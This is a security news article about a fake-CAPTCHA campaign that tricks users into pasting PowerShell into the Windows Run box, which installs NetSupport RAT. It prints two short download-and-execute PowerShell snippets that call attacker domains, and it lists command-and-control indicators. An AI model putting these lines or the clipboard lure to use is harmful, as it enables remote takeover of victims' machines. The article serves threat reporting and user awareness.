Fake ‘Prove You’re Human’ Prompts Used to Spread NetSupport RAT Malware

Security researchers have recently uncovered a devious malware campaign that employs fake CAPTCHA and “prove you’re human” screens on spoofed websites most notably, imitations of the Gitcodes and DocuSign platforms.

The carefully orchestrated campaign tricks users into executing malicious PowerShell scripts, ultimately installing NetSupport RAT (Remote Access Trojan) on their computers.

This technique capitalizes on users’ familiarity with online verification processes, making it exceptionally dangerous and difficult to detect.

The attack begins when a victim lands on a deceptive webpage, styled to look like a legitimate service such as a Gitcodes “paste tool” website or a DocuSign verification portal.

For example, the domain “gitcodes[.]org” presents itself as a popular code-sharing platform, while “docusign.sa[.]com” mimics the well-known e-signature provider.

Visitors are greeted by seemingly ordinary CAPTCHA prompts or verification requests, instructing them to confirm their humanity by copying a script and running it in the Windows Run prompt.

Technical Execution and Obfuscation Tactics

Once users copy the provided text and execute it via Win+R, a multi-stage PowerShell chain is launched.

The initial script is designed to mimic benign activity, often leveraging simple string concatenation and web requests to retrieve further payloads.

For instance, a typical first-stage script hosted on “gitcodes[.]org” might initiate a web request to a secondary domain, such as “tradingviewtool[.]com,” using a crafted user agent:

powershell$domain = "http://tradingviewtool.com/info2.php"
$ua = "TradingView"
Invoke-WebRequest -Uri $domain -UserAgent $ua -OutFile "C:\temp\next.ps1"
& "C:\temp\next.ps1"

Each subsequent stage typically performs similar actions, downloading and executing additional scripts from new domains, ultimately retrieving the NetSupport RAT payload.

The final stage ensures persistence by modifying the Windows Registry to execute a tampered version of “client32.exe” (disguised as “My Support”) at every logon, making removal difficult.

The DocuSign-spoofed variation adopts similar tactics but adds obfuscation.

The initial script delivered to the clipboard is often encoded using ROT13, a simple substitution cipher, to evade basic signature-based protections.

The user’s click on the fake CAPTCHA triggers an AJAX-based command-and-control (C2) mechanism, which polls a server-side script (“c.php”) every second until it receives confirmation that the user has run the script on their machine.

If the condition is met, the server responds, triggering a refresh and delivering a second-stage PowerShell payload:

powershell# Simplified representative sample for illustration
$url = "https://docusign.sa.com/verification/s.php?an=1"
Invoke-WebRequest -Uri $url -OutFile "$env:TEMP\stage2.ps1"
Start-Process -FilePath "powershell" -ArgumentList "-File $env:TEMP\stage2.ps1"

Multiple script stages are used to fetch additional files, such as “wbdims.exe” or “jp2launcher.exe,” which unpack and launch the NetSupport RAT executable.

Network activity logs and payload analyses indicate that the malware communicates with several servers, including “mhousecreative[.]com” and “170.130.55.203:443,” to complete its mission.

Other campaigns analyzed by security teams show a broadening scope, with identical code patterns appearing on spoofed sites for Okta, media apps, and even leveraging legitimate content-sharing platforms like GitHub and Discord for payload distribution.

Security Recommendations and Key Takeaways

This campaign underlines the escalating sophistication of phishing and malware delivery techniques.

The use of multi-stage downloads, obfuscation, and legitimate-looking prompts are designed to bypass both user caution and automated detection systems. Security experts strongly advise:

• Exercise extreme caution with any prompt instructing you to copy and run scripts or commands.
  Legitimate websites and services almost never require users to execute PowerShell or command-line scripts.
• Scrutinize website URLs and SSL certificates.
  Spoofed sites often use lookalike domains and self-signed certificates.
• Educate users about the risks of self-executing scripts.
  Awareness is a critical defense against such socially engineered attacks.

The NetSupport RAT, while a legitimate remote administration tool, is increasingly abused by threat actors for cyber espionage, data theft, and lateral movement within networks.

This “self-infect” method is reminiscent of both opportunistic and advanced persistent threat (APT) activity, and has been previously associated with groups such as FIN7, Scalert Goldfinch, and STORM-0408.

Security teams must remain vigilant, as attackers continually refine their techniques.

The recent campaign demonstrates that even seemingly simple “prove you’re human” checks can be deadly when combined with crafty scripting and user trust.